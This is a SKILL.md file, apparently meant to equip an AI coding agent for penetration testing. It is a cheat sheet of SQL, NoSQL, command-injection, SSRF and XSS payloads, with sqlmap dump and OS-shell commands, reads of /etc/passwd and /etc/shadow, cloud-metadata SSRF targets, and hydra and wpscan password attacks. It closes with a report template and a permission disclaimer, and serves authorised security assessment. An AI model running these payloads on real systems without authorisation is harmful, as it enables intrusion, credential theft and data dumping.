kunthawat/opencode-skill
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Activity
Files
628298183a3d8684b0a17f9cb2d52a233ecf17d4
opencode-skill/skills/pentesting/SKILL.md
Kunthawat Greethong 7edf5bc4d0 feat: Import 35+ skills, merge duplicates, add openclaw installer 
Major updates:
- Added 35+ new skills from awesome-opencode-skills and antigravity repos
- Merged SEO skills into seo-master
- Merged architecture skills into architecture
- Merged security skills into security-auditor and security-coder
- Merged testing skills into testing-master and testing-patterns
- Merged pentesting skills into pentesting
- Renamed website-creator to thai-frontend-dev
- Replaced skill-creator with github version
- Removed Chutes references (use MiniMax API instead)
- Added install-openclaw-skills.sh for cross-platform installation
- Updated .env.example with MiniMax API credentials
2026-03-26 11:37:39 +07:00

7.0 KiB
Raw Blame History

name, description
name description
pentesting Penetration testing skill combining SQL injection, command injection, SSRF, HTML injection, SSH, and WordPress penetration testing. Use when performing security assessments.

Penetration Testing

Comprehensive pentesting skill combining: SQL injection, command injection, SSRF, HTML injection, SSH, and specialized platform testing.

Quick Reference

Vulnerability Use Section
SQL Injection SQL Injection
Database enumeration SQLMap
Command injection Command Injection
SSRF SSRF Testing
HTML injection HTML Injection
SSH testing SSH Pentesting
WordPress WordPress Testing
Web3 Web3 Testing

SQL Injection

Types

  1. In-Band - Data returned via same channel
  2. Blind - No data returned, infer from behavior
  3. Time-Based - Use delays to infer data
  4. Out-of-Band - Data via alternative channel

Testing Checklist

# Basic tests
' OR '1'='1
' OR '1'='1' --
' OR '1'='1' #
' OR '1'='1'/*
admin' --
admin' #
admin'/*
' OR 1=1--
' OR 1=1#
' OR 1=1/*

NoSQL Injection

// MongoDB
{"$ne": null}
{"$gt": ""}
{"$regex": ".*"}
{"$where": "function() { return true; }"}

SQLMap

# Basic scan
sqlmap -u "http://target.com/?id=1"

# POST request
sqlmap -u "http://target.com/login" --data="username=admin&password=test"

# Cookie injection
sqlmap -u "http://target.com/" --cookie="PHPSESSID=abc123"

# Enumerate databases
sqlmap -u "http://target.com/?id=1" --dbs

# Enumerate tables
sqlmap -u "http://target.com/?id=1" -D database_name --tables

# Dump data
sqlmap -u "http://target.com/?id=1" -D database_name -T users --dump

# Shell access
sqlmap -u "http://target.com/?id=1" --os-shell

SQLMap Options

Option Description
--dbs List databases
-D Specify database
--tables List tables
-T Specify table
--dump Extract data
--os-shell OS shell access
--batch Non-interactive
--risk=3 High risk tests

Command Injection

Testing Checklist

# Common payloads
; ls
| ls
& ls
&& ls
|| ls
`ls`
$(ls)
| cat /etc/passwd
; cat /etc/passwd
`cat /etc/passwd`
$(cat /etc/passwd)

# Blind command injection
& sleep 5 &
| sleep 5 &
; sleep 5 &

Filter Bypass

# Space bypass
cat${IFS}/etc/passwd
cat</etc/passwd
{cat,/etc/passwd}

# No quotes
cat /etc/passwd
cat /etc/shadow

# Encoding
echo "Y2F0ICAvZXRjL3Bhc3N3ZA==" | base64 -d

SSRF (Server-Side Request Forgery)

Testing Checklist

# Localhost
http://127.0.0.1
http://localhost
http://[::1]

# Cloud metadata
http://169.254.169.254/latest/meta-data/
http://metadata.google.internal/

# Internal services
http://192.168.1.1
http://10.0.0.1
http://internal/

# File access
file:///etc/passwd
dict://localhost:11211/stats
sftp://localhost/

SSRF Bypasses

# DNS rebinding
http://127.1.1.1
http://0x7f000001

# URL encoding
http://%31%32%37%2e%30%2e%30%2e%31

# IP shortening
http://2130706433
http://017700000001

# IPv6
http://[0:0:0:0:0:ffff:127.0.0.1]

HTML Injection

Testing Checklist

<script>alert(1)</script>
<img src=x onerror=alert(1)>
<svg onload=alert(1)>
<body onload=alert(1)>
<iframe src="javascript:alert(1)">
<a href="javascript:alert(1)">click</a>
<div style="background:url(javascript:alert(1))">
<marquee onstart=alert(1)>

XSS Contexts

Context Payload
HTML body <script>alert(1)</script>
Attribute " onmouseover=alert(1) x="
URL javascript:alert(1)
CSS style="x:expression(alert(1))"
JavaScript ';alert(1);//

SSH Penetration Testing

Testing Checklist

# SSH version detection
ssh -s target.com

# Banner grabbing
nc target.com 22

# Authentication testing
hydra -l root -p password ssh://target.com
medusa -h target.com -u root -P passwords.txt -M ssh

# Key authentication
ssh -i key.pem root@target.com

# Weak keys check
./ssh-audit.py target.com

SSH Audit

# Check SSH config
sshd -T

# Common issues
# - Weak ciphers
# - Old protocol
# - Root login allowed
# - Empty passwords
# - Default keys

WordPress Penetration Testing

Enumeration

# Version detection
curl -s target.com/ | grep generator

# User enumeration
curl -s "target.com/wp-json/wp/v2/users/"

# Plugins
curl -s "target.com/wp-content/plugins/"
wpscan --url target.com --enumerate p

# Themes
wpscan --url target.com --enumerate t

# Users
wpscan --url target.com --enumerate u

Common Vulnerabilities

# Plugin vulnerabilities
wpscan --url target.com --enumerate vp

# Password attacks
wpscan --url target.com --passwords wordlist.txt

# XMLRPC
curl -X POST "http://target.com/xmlrpc.php" -d "<?xml version='1.0'?><methodCall><methodName>wp.getUsers</methodName></methodCall>"

# Debug mode
curl -s "target.com/wp-config.php" | grep WP_DEBUG

WPScan

# Full scan
wpscan --url target.com --enumerate all --api-token YOUR_TOKEN

# Vulnerability scan
wpscan --url target.com --enumerate vpt

# Password attack
wpscan --url target.com -P passwords.txt -U admin

Web3 Testing

Smart Contract Testing

# Slither - static analysis
slither contract.sol

# Mythril - security analysis
myth analyze contract.sol

# Echidna - fuzzing
echidna contract.sol

# Foundry - testing framework
forge test

Common Vulnerabilities

Vulnerability Description
Reentrancy Withdraw before state update
Integer overflow Math errors in calculations
Access control Missing modifiers
Front-running Transaction ordering
Timestamp dependence Block timestamp manipulation

OWASP Top 10 (2023)

| A01 | Broken Access Control | | A02 | Cryptographic Failures | | A03 | Injection | | A04 | Insecure Design | | A05 | Security Misconfiguration | | A06 | Vulnerable Components | | A07 | Auth Failures | | A08 | Data Integrity Failures | | A09 | Logging Failures | | A10 | SSRF |

Report Template

Finding Details

## [Finding Title]

**Severity:** Critical / High / Medium / Low / Informational

**CVSS Score:** [0.0-10.0]

**Description:**
[Detailed description of the vulnerability]

**Impact:**
[How this could be exploited and its business impact]

**Steps to Reproduce:**
1. [Step 1]
2. [Step 2]
3. [Step 3]

**Proof of Concept:**
[Code snippets, screenshots, etc.]

**Remediation:**
[How to fix the vulnerability]

**References:**
- [Link 1]
- [Link 2]

Legal Disclaimer

WARNING: Only test systems you have explicit written permission to test. Unauthorized penetration testing is illegal.

Best Practices

  1. Get Written Permission - Before any testing
  2. Define Scope - Clear boundaries
  3. Document Everything - Keep detailed notes
  4. Don't Exploit - Demonstrate impact, don't destroy
  5. Report Responsibly - Follow responsible disclosure
  6. Prioritize - Focus on high-impact findings
Reference in New Issue View Git Blame Copy Permalink